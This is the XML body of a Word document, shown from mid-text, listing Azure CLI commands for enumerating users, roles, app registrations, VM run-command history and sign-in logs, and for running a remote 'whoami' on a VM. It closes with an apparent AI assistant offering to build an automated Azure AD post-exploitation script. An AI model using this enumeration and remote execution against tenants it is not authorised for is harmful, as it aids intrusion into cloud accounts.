      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>Name:displayName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>UserPrincipalName:userPrincipalName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>}' -o table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D84DBE" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r>
        <w:pict w14:anchorId="7FB58EC8">
          <v:rect id="_x0000_i1046" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2B6662" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Check Role Assignments for a User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F03C13F" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>az</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> role assignment list --assignee user@domain.com --query '[].{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>Role:roleDefinitionName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>Scope:scope</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>}' -o table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1993A1" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r>
        <w:pict w14:anchorId="73338ABC">
          <v:rect id="_x0000_i1047" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="36419088" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. List All App Registrations (Service Principals)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5293CA" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>az</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> ad app list --query '[].{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>AppName:displayName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>AppId:appId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>ObjectId:objectId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>}' -o table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FC72D0" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r>
        <w:pict w14:anchorId="1B5E46B6">
          <v:rect id="_x0000_i1048" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCD8BE0" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. Get Details of a Specific App Registration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417BE2F2" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>az</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> ad app show --id &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>appId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BE3E32" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r>
        <w:pict w14:anchorId="0ACB63B3">
          <v:rect id="_x0000_i1049" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4564EDAA" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. Enumerate Azure VM Run Command History</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFE6301" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r w:rsidRPr="00022C5E">
        <w:t>Azure CLI can query VM run command invocations if you have access:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79290BCE" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>az</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>vm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> run-command list --resource-group &lt;resource-group&gt; --name &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>vm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>-name&gt; -o table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B6D400" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r>
        <w:pict w14:anchorId="37BC8A9E">
          <v:rect id="_x0000_i1050" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEFC8B6" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10. Execute a Command Remotely on the Azure VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF3B73F" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r w:rsidRPr="00022C5E">
        <w:t>If you have permission to invoke run commands on the VM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C9D083" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>az</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>vm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> run-command invoke --command-id </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>RunPowerShellScript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> --name &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>vm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>-name&gt; --resource-group &lt;resource-group&gt; --scripts "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20512FB2" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">Replace </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>RunPowerShellScript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>RunShellScript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> for Linux VMs and adjust the commands accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659F8E1D" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r>
        <w:pict w14:anchorId="571E98E7">
          <v:rect id="_x0000_i1051" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="351BCF32" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11. List Azure AD Roles and Assignments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E870C8" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>az</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> role definition list --query '[].{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>RoleName:roleName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>Description:description</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>}' -o table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3B644D" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A"/>
    <w:p w14:paraId="6783A7ED" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>az</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> role assignment list --all --query '[].{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>PrincipalName:principalName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>Role:roleDefinitionName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>Scope:scope</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>}' -o table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CE13A7" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r>
        <w:pict w14:anchorId="4BDCB706">
          <v:rect id="_x0000_i1052" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD4BE5E" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12. Check Azure AD Sign-In Logs (Requires proper permissions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4897E7AD" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>az</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> monitor log-analytics query -w &lt;workspace-id&gt; --analytics-query "SigninLogs | take 10"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069FB549" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r>
        <w:pict w14:anchorId="6D664A9A">
          <v:rect id="_x0000_i1053" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FA7867" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Additional Tips</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE9DAD1" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">Combine queries with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>jq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> or grep to filter data as needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7C3DC6" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">Export output as JSON (-o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>) for further offline analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155A911A" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:t>Automate script execution in bash or PowerShell scripts for repetitive enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7D4073" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r>
        <w:pict w14:anchorId="0848E598">
          <v:rect id="_x0000_i1054" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="361E69D9" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">If you want, I can help you build a full </w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>automated Azure AD post-exploitation script</w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> that chains these commands based on your access level. Would you like that?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD43D26" w14:textId="77777777" w:rsidR="00F41B33" w:rsidRDefault="00F41B33"/>
    <w:sectPr w:rsidR="00F41B33" w:rsidSect="00D57BC5">
      <w:pgSz w:w="12240" w:h="15840" w:code="1"/>
      <w:pgMar w:top="720" w:right="720" w:bottom="720" w:left="720" w:header="482" w:footer="48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8A6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5180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C3F88"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E6C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B1349"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1CE6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04F5B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="51DC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D07BB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="85FC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76C61"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="23A0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723CC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2A48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06E90"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B7EE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F4D49"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3A0E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17467"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CD04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27AAD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1DB6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34AAB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AC18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27EDD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8730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D37E3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7A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E29E3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="639E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121CB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="26DA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0D571D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7C8A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220B6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="52A6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350D1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="59A6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80543"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0632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13730"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B4C6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404852"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7F36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E27890"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="02AC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BA5368"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2A80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F637FF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FC04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816D11"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FC6C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A265FC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="62A4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22701F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3F62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95B98"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5AC4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AA2856"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="64F47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BF77FA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2312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077512"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0250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1F4AEB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DA14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180546">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="460391450">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="38744745">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="422647891">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1934431822">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="559483341">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="782572034">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="707949454">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="796266072">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1543202248">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1862276504">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="564224792">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1951425811">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="742486011">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="973101371">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1497499287">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="365298511">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="960304816">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1897470306">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="950672484">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1826240221">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="531067644">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1528986381">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1877934134">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="987247542">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1087772764">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="198859997">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="817724440">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="1735349830">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="805897202">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="229198825">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="932712051">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="11231605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99A"/>
    <w:rsid w:val="000017B5"/>
    <w:rsid w:val="0002203E"/>
    <w:rsid w:val="00033139"/>
    <w:rsid w:val="000439E4"/>
    <w:rsid w:val="0004748A"/>
    <w:rsid w:val="0006299B"/>
    <w:rsid w:val="00066ABF"/>
    <w:rsid w:val="00072945"/>
    <w:rsid w:val="00076E93"/>
    <w:rsid w:val="00077189"/>
    <w:rsid w:val="000918CB"/>
    <w:rsid w:val="0009312D"/>
    <w:rsid w:val="000A5158"/>
    <w:rsid w:val="000B7F32"/>
    <w:rsid w:val="000C388F"/>
    <w:rsid w:val="000C60D5"/>
    <w:rsid w:val="000D6154"/>
    <w:rsid w:val="000D740B"/>
    <w:rsid w:val="000F524D"/>
    <w:rsid w:val="001006C6"/>
    <w:rsid w:val="00102773"/>
    <w:rsid w:val="00102E91"/>
    <w:rsid w:val="00107676"/>
    <w:rsid w:val="00113072"/>
    <w:rsid w:val="00114A6E"/>
    <w:rsid w:val="001322ED"/>
    <w:rsid w:val="001336DC"/>
    <w:rsid w:val="00135E9B"/>
    <w:rsid w:val="0014690C"/>
    <w:rsid w:val="00177948"/>
    <w:rsid w:val="00177CFB"/>
    <w:rsid w:val="00181AD7"/>
    <w:rsid w:val="00184D18"/>
    <w:rsid w:val="00187466"/>
    <w:rsid w:val="001924F6"/>
    <w:rsid w:val="0019345C"/>
    <w:rsid w:val="001A4621"/>
    <w:rsid w:val="001A5AAA"/>
    <w:rsid w:val="001A74BD"/>
    <w:rsid w:val="001C644C"/>
    <w:rsid w:val="001C68E0"/>
    <w:rsid w:val="001D1A64"/>
    <w:rsid w:val="001D58A2"/>
    <w:rsid w:val="001D66CF"/>
    <w:rsid w:val="001E2E6C"/>
    <w:rsid w:val="001E301C"/>
    <w:rsid w:val="001E5594"/>
    <w:rsid w:val="001F5D83"/>
    <w:rsid w:val="001F65C3"/>
    <w:rsid w:val="002060F8"/>
    <w:rsid w:val="002116F5"/>
    <w:rsid w:val="0021300D"/>
    <w:rsid w:val="00224E8A"/>
    <w:rsid w:val="00227491"/>
    <w:rsid w:val="00232E9A"/>
    <w:rsid w:val="0023661A"/>
    <w:rsid w:val="00251308"/>
    <w:rsid w:val="002542AC"/>
    <w:rsid w:val="00260FC6"/>
    <w:rsid w:val="00264C27"/>
    <w:rsid w:val="00266F2F"/>
    <w:rsid w:val="0027337F"/>
    <w:rsid w:val="00273FEB"/>
    <w:rsid w:val="002743C1"/>
    <w:rsid w:val="00274649"/>
